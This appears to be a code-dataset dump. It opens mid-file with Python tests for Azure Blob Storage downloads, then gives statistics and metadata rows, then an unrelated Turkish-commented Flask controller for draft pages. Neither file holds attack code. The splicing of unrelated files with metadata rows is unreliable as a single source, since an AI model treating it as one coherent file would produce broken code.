blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(blob_data)
# Act
content = blob.download_blob()
# Assert
self.assertEqual(blob_data, content.readall())
self.assertEqual(0, content.properties.size)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_bytes(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
# Act
content = blob.download_blob(max_concurrency=2).readall()
# Assert
self.assertEqual(self.byte_data, content)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_bytes_with_single_byte(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
# Act
content = blob.download_blob(offset=0, length=1).readall()
# Assert
self.assertEqual(1, len(content))
self.assertEqual(self.byte_data[0], content[0])
# Act
content = blob.download_blob(offset=5, length=1).readall()
# Assert
self.assertEqual(1, len(content))
self.assertEqual(self.byte_data[5], content[0])
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_bytes_with_zero_byte(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_data = b''
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(blob_data)
# Act
# the get request should fail in this case since the blob is empty and yet there is a range specified
with self.assertRaises(HttpResponseError) as e:
blob.download_blob(offset=0, length=5)
self.assertEqual(StorageErrorCode.invalid_range, e.exception.error_code)
with self.assertRaises(HttpResponseError) as e:
blob.download_blob(offset=3, length=5)
self.assertEqual(StorageErrorCode.invalid_range, e.exception.error_code)
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_with_missing_start_range(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_data = b'foobar'
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(blob_data)
# Act
# the get request should fail fast in this case since start_range is missing while end_range is specified
with self.assertRaises(ValueError):
blob.download_blob(length=3)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_bytes_snapshot(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
snapshot_ref = blob.create_snapshot()
snapshot = self.bsc.get_blob_client(self.container_name, self.byte_blob, snapshot=snapshot_ref)
blob.upload_blob(self.byte_data, overwrite=True) # Modify the blob so the Etag no longer matches
# Act
content = snapshot.download_blob(max_concurrency=2).readall()
# Assert
self.assertEqual(self.byte_data, content)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_bytes_with_progress(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
progress = []
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
# Act
content = blob.download_blob(raw_response_hook=callback, max_concurrency=2).readall()
# Assert
self.assertEqual(self.byte_data, content)
self.assert_download_progress(
len(self.byte_data),
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
@GlobalStorageAccountPreparer()
def test_get_blob_to_bytes_non_parallel(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
progress = []
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
# Act
content = blob.download_blob(raw_response_hook=callback, max_concurrency=1).readall()
# Assert
self.assertEqual(self.byte_data, content)
self.assert_download_progress(
len(self.byte_data),
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
@GlobalStorageAccountPreparer()
def test_get_blob_to_bytes_small(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_data = self.get_random_bytes(1024)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(blob_data)
progress = []
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
# Act
content = blob.download_blob(raw_response_hook=callback).readall()
# Assert
self.assertEqual(blob_data, content)
self.assert_download_progress(
len(blob_data),
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_stream(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
# Act
FILE_PATH = 'get_blob_to_streamm.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
downloader = blob.download_blob(max_concurrency=2)
read_bytes = downloader.readinto(stream)
# Assert
self.assertEqual(read_bytes, len(self.byte_data))
with open(FILE_PATH, 'rb') as stream:
actual = stream.read()
self.assertEqual(self.byte_data, actual)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_stream_with_progress(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
progress = []
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
# Act
FILE_PATH = 'blob_to_stream_with_progress.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
downloader = blob.download_blob(raw_response_hook=callback, max_concurrency=2)
read_bytes = downloader.readinto(stream)
# Assert
self.assertEqual(read_bytes, len(self.byte_data))
with open(FILE_PATH, 'rb') as stream:
actual = stream.read()
self.assertEqual(self.byte_data, actual)
self.assert_download_progress(
len(self.byte_data),
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
self._teardown(FILE_PATH)
@GlobalStorageAccountPreparer()
def test_get_blob_to_stream_non_parallel(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
progress = []
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
# Act
FILE_PATH = 'stream_non_parallel.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
downloader = blob.download_blob(raw_response_hook=callback, max_concurrency=1)
read_bytes = downloader.readinto(stream)
# Assert
self.assertEqual(read_bytes, len(self.byte_data))
with open(FILE_PATH, 'rb') as stream:
actual = stream.read()
self.assertEqual(self.byte_data, actual)
self.assert_download_progress(
len(self.byte_data),
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
self._teardown(FILE_PATH)
@GlobalStorageAccountPreparer()
def test_get_blob_to_stream_small(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_data = self.get_random_bytes(1024)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(blob_data)
progress = []
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
# Act
FILE_PATH = 'blob_to_stream_small.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
downloader = blob.download_blob(raw_response_hook=callback, max_concurrency=2)
read_bytes = downloader.readinto(stream)
# Assert
self.assertEqual(read_bytes, 1024)
with open(FILE_PATH, 'rb') as stream:
actual = stream.read()
self.assertEqual(blob_data, actual)
self.assert_download_progress(
len(blob_data),
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_path(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
# Act
FILE_PATH = 'get_blob_to_path.temp.{}.dat'.format(str(uuid.uuid4()))
end_range = self.config.max_single_get_size
with open(FILE_PATH, 'wb') as stream:
downloader = blob.download_blob(offset=1, length=end_range - 1, max_concurrency=2)
read_bytes = downloader.readinto(stream)
# Assert
self.assertEqual(read_bytes, end_range - 1)
with open(FILE_PATH, 'rb') as stream:
actual = stream.read()
self.assertEqual(self.byte_data[1:end_range], actual)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_path_with_progress(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
progress = []
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
# Act
start_range = 3
end_range = self.config.max_single_get_size + 1024
FILE_PATH = 'blob_to_path_with_progress.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
downloader = blob.download_blob(
offset=start_range,
length=end_range,
raw_response_hook=callback,
max_concurrency=2)
read_bytes = downloader.readinto(stream)
# Assert
self.assertEqual(read_bytes, end_range)
with open(FILE_PATH, 'rb') as stream:
actual = stream.read()
self.assertEqual(self.byte_data[start_range:end_range + start_range], actual)
self.assert_download_progress(
end_range,
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
self._teardown(FILE_PATH)
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_path_small(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
# Act
FILE_PATH = 'blob_to_path_small.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
downloader = blob.download_blob(offset=1, length=4, max_concurrency=2)
read_bytes = downloader.readinto(stream)
# Assert
self.assertEqual(read_bytes, 4)
with open(FILE_PATH, 'rb') as stream:
actual = stream.read()
self.assertEqual(self.byte_data[1:5], actual)
self._teardown(FILE_PATH)
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_path_non_parallel(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
# Act
FILE_PATH = 'blob_to_path_non_parallel.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
downloader = blob.download_blob(offset=1, length=3, max_concurrency=1)
read_bytes = downloader.readinto(stream)
# Assert
self.assertEqual(read_bytes, 3)
with open(FILE_PATH, 'rb') as stream:
actual = stream.read()
self.assertEqual(self.byte_data[1:4], actual)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_path_invalid_range_parallel(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_size = self.config.max_single_get_size + 1
blob_data = self.get_random_bytes(blob_size)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(blob_data)
# Act
end_range = 2 * self.config.max_single_get_size
FILE_PATH = 'path_invalid_range_parallel.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
downloader = blob.download_blob(offset=1, length=end_range, max_concurrency=2)
read_bytes = downloader.readinto(stream)
# Assert
self.assertEqual(read_bytes, blob_size)
with open(FILE_PATH, 'rb') as stream:
actual = stream.read()
self.assertEqual(blob_data[1:blob_size], actual)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_path_invalid_range_non_parallel(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_size = 1024
blob_data = self.get_random_bytes(blob_size)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(blob_data)
# Act
end_range = 2 * self.config.max_single_get_size
FILE_PATH = 'invalid_range_non_parallel.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
downloader = blob.download_blob(offset=1, length=end_range, max_concurrency=2)
read_bytes = downloader.readinto(stream)
# Assert
self.assertEqual(read_bytes, blob_size)
with open(FILE_PATH, 'rb') as stream:
actual = stream.read()
self.assertEqual(blob_data[1:blob_size], actual)
self._teardown(FILE_PATH)
# Assert
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_text(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
text_blob = self.get_resource_name('textblob')
text_data = self.get_random_text_data(self.config.max_single_get_size + 1)
blob = self.bsc.get_blob_client(self.container_name, text_blob)
blob.upload_blob(text_data)
# Act
stream = blob.download_blob(max_concurrency=2, encoding='UTF-8')
content = stream.readall()
# Assert
self.assertEqual(text_data, content)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_text_with_progress(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
text_blob = self.get_resource_name('textblob')
text_data = self.get_random_text_data(self.config.max_single_get_size + 1)
blob = self.bsc.get_blob_client(self.container_name, text_blob)
blob.upload_blob(text_data)
progress = []
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
# Act
stream = blob.download_blob(
raw_response_hook=callback,
max_concurrency=2,
encoding='UTF-8')
content = stream.readall()
# Assert
self.assertEqual(text_data, content)
self.assert_download_progress(
len(text_data.encode('utf-8')),
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
@GlobalStorageAccountPreparer()
def test_get_blob_to_text_non_parallel(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
text_blob = self._get_blob_reference()
text_data = self.get_random_text_data(self.config.max_single_get_size + 1)
blob = self.bsc.get_blob_client(self.container_name, text_blob)
blob.upload_blob(text_data)
progress = []
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
# Act
stream = blob.download_blob(
raw_response_hook=callback,
max_concurrency=1,
encoding='UTF-8')
content = stream.readall()
# Assert
self.assertEqual(text_data, content)
self.assert_download_progress(
len(text_data),
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
@GlobalStorageAccountPreparer()
def test_get_blob_to_text_small(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_data = self.get_random_text_data(1024)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(blob_data)
progress = []
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
# Act
stream = blob.download_blob(raw_response_hook=callback, encoding='UTF-8')
content = stream.readall()
# Assert
self.assertEqual(blob_data, content)
self.assert_download_progress(
len(blob_data),
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
@GlobalStorageAccountPreparer()
def test_get_blob_to_text_with_encoding(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
text = u'hello 啊齄丂狛狜 world'
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(text, encoding='utf-16')
# Act
stream = blob.download_blob(encoding='UTF-16')
content = stream.readall()
# Assert
self.assertEqual(text, content)
@GlobalStorageAccountPreparer()
def test_get_blob_to_text_with_encoding_and_progress(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
text = u'hello 啊齄丂狛狜 world'
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(text, encoding='utf-16')
# Act
progress = []
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
stream = blob.download_blob(raw_response_hook=callback, encoding='UTF-16')
content = stream.readall()
# Assert
self.assertEqual(text, content)
self.assert_download_progress(
len(text.encode('utf-8')),
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
@GlobalStorageAccountPreparer()
def test_get_blob_non_seekable(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
# Act
FILE_PATH = 'get_blob_non_seekable.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
non_seekable_stream = StorageGetBlobTest.NonSeekableFile(stream)
downloader = blob.download_blob(max_concurrency=1)
read_bytes = downloader.readinto(non_seekable_stream)
# Assert
self.assertEqual(read_bytes, len(self.byte_data))
with open(FILE_PATH, 'rb') as stream:
actual = stream.read()
self.assertEqual(self.byte_data, actual)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_non_seekable_parallel(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
# Act
FILE_PATH = 'get_blob_non_seekable.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
non_seekable_stream = StorageGetBlobTest.NonSeekableFile(stream)
with self.assertRaises(ValueError):
downloader = blob.download_blob(max_concurrency=2)
properties = downloader.readinto(non_seekable_stream)
self._teardown(FILE_PATH)
@GlobalStorageAccountPreparer()
def test_get_blob_to_stream_exact_get_size(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
byte_data = self.get_random_bytes(self.config.max_single_get_size)
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(byte_data)
progress = []
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
# Act
FILE_PATH = 'blob_to_stream_exact_get_size.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
downloader = blob.download_blob(raw_response_hook=callback, max_concurrency=2)
properties = downloader.readinto(stream)
# Assert
with open(FILE_PATH, 'rb') as stream:
actual = stream.read()
self.assertEqual(byte_data, actual)
self.assert_download_progress(
len(byte_data),
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
self._teardown(FILE_PATH)
@GlobalStorageAccountPreparer()
def test_get_blob_exact_get_size(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
byte_data = self.get_random_bytes(self.config.max_single_get_size)
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(byte_data)
progress = []
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
# Act
content = blob.download_blob(raw_response_hook=callback).readall()
# Assert
self.assertEqual(byte_data, content)
self.assert_download_progress(
len(byte_data),
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_exact_chunk_size(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
byte_data = self.get_random_bytes(
self.config.max_single_get_size +
self.config.max_chunk_get_size)
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(byte_data)
progress = []
def callback(response):
current = response.context['download_stream_current']
total = response.context['data_stream_total']
progress.append((current, total))
# Act
content = blob.download_blob(raw_response_hook=callback).readall()
# Assert
self.assertEqual(byte_data, content)
self.assert_download_progress(
len(byte_data),
self.config.max_chunk_get_size,
self.config.max_single_get_size,
progress)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_stream_with_md5(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
# Act
FILE_PATH = 'stream_with_md5.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
downloader = blob.download_blob(validate_content=True, max_concurrency=2)
read_bytes = downloader.readinto(stream)
# Assert
self.assertEqual(read_bytes, len(self.byte_data))
with open(FILE_PATH, 'rb') as stream:
actual = stream.read()
self.assertEqual(self.byte_data, actual)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_with_md5(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
# Act
content = blob.download_blob(validate_content=True, max_concurrency=2).readall()
# Assert
self.assertEqual(self.byte_data, content)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_range_to_stream_with_overall_md5(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
props = blob.get_blob_properties()
props.content_settings.content_md5 = b'MDAwMDAwMDA='
blob.set_http_headers(props.content_settings)
# Act
FILE_PATH = 'blob_range_to_stream_with_overall_md5.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
downloader = blob.download_blob(offset=0, length=1024, validate_content=True, max_concurrency=2)
read_bytes = downloader.readinto(stream)
# Assert
self.assertEqual(downloader.size, 1024)
self.assertEqual(read_bytes, 1024)
self.assertEqual(b'MDAwMDAwMDA=', downloader.properties.content_settings.content_md5)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_range_with_overall_md5(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
content = blob.download_blob(offset=0, length=1024, validate_content=True)
self._setup(storage_account, storage_account_key)
props = blob.get_blob_properties()
props.content_settings.content_md5 = b'MDAwMDAwMDA='
blob.set_http_headers(props.content_settings)
# Act
content = blob.download_blob(offset=0, length=1024, validate_content=True)
# Assert
self.assertEqual(content.properties.size, 1024)
self.assertEqual(b'MDAwMDAwMDA=', content.properties.content_settings.content_md5)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_range_with_range_md5(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
content = blob.download_blob(offset=0, length=1024, validate_content=True)
self._setup(storage_account, storage_account_key)
props = blob.get_blob_properties()
props.content_settings.content_md5 = None
blob.set_http_headers(props.content_settings)
# Act
content = blob.download_blob(offset=0, length=1024, validate_content=True)
# Assert
self.assertIsNotNone(content.properties.content_settings.content_type)
self.assertIsNone(content.properties.content_settings.content_md5)
# ------------------------------------------------------------------------------
| 42.071811
| 1,392
| 0.683667
| 4,555
| 39,253
| 5.564654
| 0.059934
| 0.085059
| 0.051643
| 0.083955
| 0.887995
| 0.872687
| 0.854736
| 0.846609
| 0.838955
| 0.83213
| 0
| 0.013287
| 0.219652
| 39,253
| 932
| 1,393
| 42.116953
| 0.814208
| 0.071612
| 0
| 0.739938
| 0
| 0.001548
| 0.074785
| 0.061022
| 0
| 1
| 0
| 0
| 0.117647
| 1
| 0.089783
| false
| 0.003096
| 0.01548
| 0.004644
| 0.113003
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
97d9df6a82d368ce76cd6f3016dbbc3135c2a856
| 5,407
|
py
|
Python
|
copy/python/controller/v_taslak.py
|
koneviahmet/python-cli
|
cb65c95489c5e2a3ec20139be743855f831d0f42
|
[
"MIT"
] | 4
|
2020-07-22T19:20:52.000Z
|
2020-07-31T06:05:07.000Z
|
copy/python/controller/v_taslak.py
|
koneviahmet/python-cli
|
cb65c95489c5e2a3ec20139be743855f831d0f42
|
[
"MIT"
] | null | null | null |
copy/python/controller/v_taslak.py
|
koneviahmet/python-cli
|
cb65c95489c5e2a3ec20139be743855f831d0f42
|
[
"MIT"
] | null | null | null |
from __main__ import app, render_template, request, session, make_response
from library.lUser import lUser
from library.yetki import Yetki
from model.taslak import Taslak
# yetki kullanım örneği
@app.route('/v_taslak/yetki')
def v_taslak_yetki():
if Yetki(3).yetkiDenetle('denemeYetki'):
return "yetki var"
else:
return "yetki yok"
@app.route('/v_taslak')
def v_taslak():
data = dict()
data['deneme'] = "deneme"
data['header'] = render_template('klasik/header/header.html', data = data)
data['menu'] = render_template('klasik/menu/menu.html', data = data)
data['content'] = render_template('klasik/content/taslak/anasayfa.html', data = data)
data['footer'] = render_template('klasik/footer/footer.html', data = data)
return render_template('klasik/index.html', data = data)
@app.route('/v_taslak/taslak_list')
def v_taslak_list():
data = dict()
hataSayfa = '404.html'
userInfo = lUser().userInfo()
data['userInfo'] = userInfo
if not userInfo:
data['hata'] = "hata"
hataSayfa = 'yetki.html'
# hata denetimini yapalım
if 'hata' in data:
data['content'] = render_template('klasik/hata/' + hataSayfa, data = data)
else:
# hata yok demektri
data['allTaslak'] = Taslak.query.all()
data['header'] = render_template('klasik/header/header.html', data = data)
data['menu'] = render_template('klasik/menu/menu.html', data = data)
data['content'] = render_template('klasik/content/taslak/taslak_list.html', data = data)
data['footer'] = render_template('klasik/footer/footer.html', data = data)
return render_template('klasik/index.html', data = data)
@app.route('/v_taslak/taslak_detay/<taslakId>')
def v_taslak_detay(taslakId):
data = dict()
hataSayfa = '404.html'
userInfo = lUser().userInfo()
data['userInfo'] = userInfo
if not userInfo:
data['hata'] = "hata"
hataSayfa = 'yetki.html'
# uye bilgilerini alalım
taslakInfo = Taslak.query.filter_by(taslak_id=str(taslakId)).first()
data['taslakInfo'] = taslakInfo
if not taslakInfo:
data['hata'] = "taslak bulunamadı."
# hata denetimini yapalım
if 'hata' in data:
data['content'] = render_template('klasik/hata/' + hataSayfa, data = data)
else:
data['header'] = render_template('klasik/header/header.html', data = data)
data['menu'] = render_template('klasik/menu/menu.html', data = data)
data['content'] = render_template('klasik/content/taslak/taslak_detay.html', data = data)
data['footer'] = render_template('klasik/footer/footer.html', data = data)
return render_template('klasik/index.html', data = data)
@app.route('/v_taslak/taslak_duzenle/<taslakId>')
def v_taslak_duzenle(taslakId):
data = dict()
hataSayfa = '404.html'
userInfo = lUser().userInfo()
data['userInfo'] = userInfo
if not userInfo:
data['hata'] = "hata"
hataSayfa = 'yetki.html'
taslakInfo = Taslak.query.filter_by(taslak_id=str(taslakId)).first()
data['taslakInfo'] = taslakInfo
# hata denetimini yapalım
if 'hata' in data:
data['content'] = render_template('klasik/hata/' + hataSayfa, data = data)
else:
data['header'] = render_template('klasik/header/header.html', data = data)
data['menu'] = render_template('klasik/menu/menu.html', data = data)
data['content'] = render_template('klasik/content/taslak/taslak_duzenle.html', data = data)
data['footer'] = render_template('klasik/footer/footer.html', data = data)
return render_template('klasik/index.html', data = data)
@app.route('/v_taslak/taslak_ara')
def v_taslak_ara():
data = dict()
hataSayfa = '404.html'
userInfo = lUser().userInfo()
data['userInfo'] = userInfo
if not userInfo:
data['hata'] = "hata"
hataSayfa = 'yetki.html'
# hata denetimini yapalım
if 'hata' in data:
data['content'] = render_template('klasik/hata/' + hataSayfa, data = data)
else:
# hata yok demektri
data['header'] = render_template('klasik/header/header.html', data = data)
data['menu'] = render_template('klasik/menu/menu.html', data = data)
data['content'] = render_template('klasik/content/taslak/taslak_ara.html', data = data)
data['footer'] = render_template('klasik/footer/footer.html', data = data)
return render_template('klasik/index.html', data = data)
# üye profil sayfası
@app.route('/v_taslak/taslak_kaydet')
def v_taslak_kaydet():
data = dict()
hataSayfa = '404.html'
userInfo = lUser().userInfo()
data['userInfo'] = userInfo
if not userInfo:
data['hata'] = "hata"
hataSayfa = 'yetki.html'
# hata denetimini yapalım
if 'hata' in data:
data['content'] = render_template('klasik/hata/' + hataSayfa, data = data)
else:
data['header'] = render_template('klasik/header/header.html', data = data)
data['menu'] = render_template('klasik/menu/menu.html', data = data)
data['content'] = render_template('klasik/content/taslak/taslak_kaydet.html', data = data)
data['footer'] = render_template('klasik/footer/footer.html', data = data)
return render_template('klasik/index.html', data = data)
| 31.619883
| 99
| 0.64361
| 649
| 5,407
| 5.246533
| 0.107858
| 0.13627
| 0.20558
| 0.084582
| 0.838179
| 0.832012
| 0.832012
| 0.832012
| 0.832012
| 0.832012
| 0
| 0.003737
| 0.208064
| 5,407
| 170
| 100
| 31.805882
| 0.791453
| 0.040503
| 0
| 0.720721
| 0
| 0
| 0.276029
| 0.148348
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063063
| false
| 0
| 0.036036
| 0
| 0.171171
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3f60ad3c772ebf7823553aca5321a2824b572422
| 2,142
|
py
|
Python
|
